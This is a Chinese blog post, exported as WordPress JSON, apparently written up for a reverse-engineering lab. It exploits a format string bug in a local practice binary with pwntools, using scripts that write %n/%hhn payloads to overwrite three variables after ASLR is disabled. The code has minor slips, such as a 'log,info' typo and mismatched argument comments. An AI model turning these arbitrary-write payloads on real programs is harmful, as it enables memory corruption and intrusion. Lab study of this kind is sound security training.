{"id":192,"date":"2025-04-14T00:58:04","date_gmt":"2025-04-13T16:58:04","guid":{"rendered":"http:\/\/www.xtmouse.top\/?p=192"},"modified":"2025-04-14T00:58:04","modified_gmt":"2025-04-13T16:58:04","slug":"%e9%80%86%e5%90%91%e5%ae%9e%e9%aa%8c-%e6%a0%bc%e5%bc%8f%e5%8c%96%e5%ad%97%e7%ac%a6%e4%b8%b2%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8","status":"publish","type":"post","link":"http:\/\/www.xtmouse.top\/index.php\/2025\/04\/14\/%e9%80%86%e5%90%91%e5%ae%9e%e9%aa%8c-%e6%a0%bc%e5%bc%8f%e5%8c%96%e5%ad%97%e7%ac%a6%e4%b8%b2%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8\/","title":{"rendered":"\u9006\u5411\u5b9e\u9a8c-\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5229\u7528"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u9898\u76ee\u5982\u4e0b<\/h2>\n\n\n\n<p>\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6<\/p>\n\n\n\n<p>\u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a\u53d8\u91cf\uff0c\u6210\u529f\u6253\u5370\u76f8\u5e94\u7684puts\u4fe1\u606f\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"588\" height=\"542\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4.gif\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-197\"\/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"588\" height=\"542\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4.gif\" alt=\"\" class=\"wp-image-197\"\/><\/figure><\/noscript>\n\n\n\n<p>\u4f8b\u5982\uff0c\u5bf9\u4e8e\u53d8\u91cfc\u7684\u8986\u76d6\uff0c\u8f93\u51fa\u7ed3\u679c\u5982\u4e0b\u56fe\uff0c\u6210\u529f\u6253\u5370\uff1aoverwrite c successfully\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"690\" height=\"135\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1.gif\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-194\" style=\"width:840px;height:auto\"\/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"690\" height=\"135\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1.gif\" alt=\"\" class=\"wp-image-194\" style=\"width:840px;height:auto\"\/><\/figure><\/noscript>\n\n\n\n<h2 class=\"wp-block-heading\">\u89e3\u51b3\u65b9\u6cd5\uff1a<\/h2>\n\n\n\n<p>\u9996\u5148<strong>\u5173\u95edASLR<\/strong>\uff08\u786e\u4fdd\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">echo 0 | sudo tee \/proc\/sys\/kernel\/randomize_va_space<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u8fdb\u5165a == 0x10<\/h3>\n\n\n\n<p>\u9700\u8981\u786e\u5b9a\u4e24\u70b9\uff1aa\u7684\u5730\u5740\uff0ca\u7684\u504f\u79fb\u91cf<\/p>\n\n\n\n<p>a\u7684\u5730\u5740\u53ef\u901a\u8fc7gdb\u8c03\u8bd5\u7a0b\u5e8f\u6765\u83b7\u53d6\uff0c\u5177\u4f53\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"468\" height=\"24\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image.png\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-199\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image.png 468w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-300x15.png 300w\" sizes=\"auto, (max-width: 468px) 100vw, 468px\" \/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"468\" height=\"24\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image.png\" alt=\"\" class=\"wp-image-199\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image.png 468w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-300x15.png 300w\" sizes=\"auto, (max-width: 468px) 100vw, 468px\" \/><\/figure><\/noscript>\n\n\n\n<p>b vulnfunc<\/p>\n\n\n\n<p>r<\/p>\n\n\n\n<p>disassemble<\/p>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230a\u53d8\u91cf\u58f0\u660e\u7684\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"739\" height=\"411\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1.png\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-200\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1.png 739w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1-300x167.png 300w\" sizes=\"auto, (max-width: 739px) 100vw, 739px\" \/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"739\" height=\"411\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1.png\" alt=\"\" class=\"wp-image-200\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1.png 739w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1-300x167.png 300w\" sizes=\"auto, (max-width: 739px) 100vw, 739px\" \/><\/figure><\/noscript>\n\n\n\n<p>\u5728\u58f0\u660ea\u53d8\u91cf\u540e\u8bbe\u7f6e\u65ad\u70b9 b *0x08049219<\/p>\n\n\n\n<p>c<\/p>\n\n\n\n<p>x\/wx $ebp-0x110<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"246\" height=\"37\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-2.png\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-201\"\/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"246\" height=\"37\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-2.png\" alt=\"\" class=\"wp-image-201\"\/><\/figure><\/noscript>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u786e\u5b9e\u662fa\u7684\u503c<\/p>\n\n\n\n<p>\uff01\uff01\uff01\uff01\uff01\u4f46\u662f\uff0c\u5728\u5229\u75280xffffd028\u6765\u4f5c\u4e3aa\u7684\u5730\u5740\u65f6\uff0c\u65e0\u6cd5\u6b63\u5e38\u8986\u5199<\/p>\n\n\n\n<p>\u539f\u56e0\u662f\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\u548c\u5b9e\u9645\u8fd0\u884c\u65f6\uff0c\u7a0b\u5e8f\u7684\u5185\u5b58\u5e03\u5c40\u53ef\u80fd\u6709\u6240\u4e0d\u540c\u3002\u8fd9\u79cd\u5dee\u5f02\u53ef\u80fd\u662f\u7531\u4e8e\u8c03\u8bd5\u5668\u5bf9\u7a0b\u5e8f\u7684\u5f71\u54cd\uff08\u5982\u8c03\u8bd5\u5668\u4f1a\u6539\u53d8\u7a0b\u5e8f\u7684\u5185\u5b58\u5206\u914d\uff09<\/p>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u4fee\u6539\u6e90\u4ee3\u7801\uff01\u5e2e\u6211\u4eec\u6253\u5370\u51fa\u6765a\u7684\u5730\u5740\uff01<\/p>\n\n\n\n<p>\u5c06\u6e90\u4ee3\u7801\u6539\u4e3a\uff08\u7ea2\u6846\u4e3a\u6dfb\u52a0\u5185\u5bb9\uff09\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"912\" height=\"815\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3.png\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-202\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3.png 912w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3-300x268.png 300w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3-768x686.png 768w\" sizes=\"auto, (max-width: 912px) 100vw, 912px\" \/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"912\" height=\"815\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3.png\" alt=\"\" class=\"wp-image-202\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3.png 912w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3-300x268.png 300w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3-768x686.png 768w\" sizes=\"auto, (max-width: 912px) 100vw, 912px\" \/><\/figure><\/noscript>\n\n\n\n<p>\u4e0b\u9762\u6211\u4eec\u8fd0\u884c\u7a0b\u5e8f\u5c31\u80fd\u770b\u5230a\u5728\u6267\u884c\u65f6\u7684\u5730\u5740<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"481\" height=\"58\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4.png\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-205\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4.png 481w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4-300x36.png 300w\" sizes=\"auto, (max-width: 481px) 100vw, 481px\" \/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"481\" height=\"58\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4.png\" alt=\"\" class=\"wp-image-205\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4.png 481w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4-300x36.png 300w\" sizes=\"auto, (max-width: 481px) 100vw, 481px\" \/><\/figure><\/noscript>\n\n\n\n<p>\u7136\u540e\u6211\u4eec\u53ef\u4ee5\u5199\u51faa\u7684\u5229\u7528\u4ee3\u7801<\/p>\n\n\n\n<pre class=\"wp-block-code has-black-color has-text-color has-link-color wp-elements-a58b70a85b19b03e1e6467db54920ef3\"><code>from pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_a():\n    p = process('.\/test2')\n\n    # \u786c\u7f16\u7801a\u7684\u5730\u5740\uff08\u901a\u8fc7gdb\u8ba1\u7b97\u5f97\u5230\uff09\n    a_addr = 0xffffd078  # \u66ff\u6362\u4e3a\u4f60\u7684\u5b9e\u9645\u5730\u5740\n\n    # \u6784\u9020payload\uff1a\u8986\u76d6a\u4e3a0x10\n    payload = p32(a_addr) + b\"%12c%7$n\"  # \u504f\u79fb\u91cf\u9700\u6839\u636e\u5b9e\u9645\u6808\u5e03\u5c40\u8c03\u6574\n    p.sendline(payload)\n    \n    # \u63a5\u6536\u8f93\u51fa\n    print(p.clean())\n    p.close()\n\nexploit_a()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"728\" height=\"350\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-5.png\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-206\" style=\"width:840px;height:auto\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-5.png 728w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-5-300x144.png 300w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"728\" height=\"350\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-5.png\" alt=\"\" class=\"wp-image-206\" style=\"width:840px;height:auto\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-5.png 728w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-5-300x144.png 300w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/><\/figure><\/noscript>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u8f93\u51fa\u4e86\u6211\u4eec\u60f3\u8981\u7684\u5185\u5bb9<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8fdb\u5165b == 2<\/h3>\n\n\n\n<p>b\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">objdump -t .\/test2 | grep b<br>objdump -t .\/test2 | grep c<\/pre>\n\n\n\n<p>b\u53d8\u91cf\u5730\u5740\u6700\u5c0f\u4e5f\u662f\u5360\u7528\u4e864\u5b57\u8282\u7684\uff0c\u6211\u4eec\u65e0\u8bba\u5982\u4f55\u90fd\u4e0d\u80fd\u8986\u76d6\u62102\uff0c\u6240\u4ee5\u601d\u8def\u5c31\u662f\u628a\u5730\u5740\u5199\u5230\u540e\u9762\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u5bfc\u5165pwn\u6a21\u5757\nfrom pwn import *\n#\u8bbe\u7f6e\u8fd0\u884c\u73af\u5883\ncontext(arch='i386',os='linux')\ncontext.terminal = &#91;'tmux','splitw','-h']\n\np   = process(\".\/test2\")\n\ndef exploit_c():\n    b_address  = 0x804c02c\n    #\u6784\u9020Payload\n    padding = b'11'\n    padding_address = b'\\x00\\x00'\n\n    Payload = padding + b'%9$n' + padding_address + p32(b_address)\n    log,info(\"Payload: %s\" % Payload)\n    #\u53d1\u9001Payload\n    p.sendline(Payload)\n\n\nexploit_c()\nprint(p.recv())<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"628\" height=\"94\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-6.png\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-207\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-6.png 628w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-6-300x45.png 300w\" sizes=\"auto, (max-width: 628px) 100vw, 628px\" \/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"628\" height=\"94\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-6.png\" alt=\"\" class=\"wp-image-207\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-6.png 628w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-6-300x45.png 300w\" sizes=\"auto, (max-width: 628px) 100vw, 628px\" \/><\/figure><\/noscript>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u51fa\u73b0\u4e86\u6211\u4eec\u9884\u671f\u7684\u8f93\u51fa<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8fdb\u5165c == 0x12345678<\/h3>\n\n\n\n<p>b\u548cc\u4f5c\u4e3a\u5168\u5c40\u53d8\u91cf\uff0c\u53ef\u4ee5\u76f4\u63a5\u67e5\u770b\u5730\u5740\uff08\u5730\u5740\u56fa\u5b9a\uff09<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">objdump -t .\/test2 | grep b<br>objdump -t .\/test2 | grep c<\/pre>\n\n\n\n<p>\u6784\u9020payload\u7684\u601d\u8def\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n\u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n    p = process('.\/test2')\n\n    c_addr = 0x804c030  # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n    # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n    # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n    payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n    \n    # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n    # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n    # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n    # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n    # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n    payload += b\"%104c%7$hhn\"    # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n    payload += b\"%222c%8$hhn\"    # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n    payload += b\"%222c%9$hhn\"    # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n    payload += b\"%222c%10$hhn\"    # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n    \n    # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n    assert len(payload) &lt;= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n    p.sendline(payload)\n    \n    # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n    output = p.recvall(timeout=2)\n    print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"395\"   class=\"lazyload\" data-src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-1024x395.png\" src=\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\" onerror=\"imgError(this)\"  alt=\"\" class=\"wp-image-208\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-1024x395.png 1024w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-300x116.png 300w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-768x296.png 768w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-1536x592.png 1536w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7.png 1603w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure >\n<noscript><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"395\" src=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-1024x395.png\" alt=\"\" class=\"wp-image-208\" srcset=\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-1024x395.png 1024w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-300x116.png 300w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-768x296.png 768w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-1536x592.png 1536w, http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7.png 1603w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/noscript>\n\n\n\n<p>\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}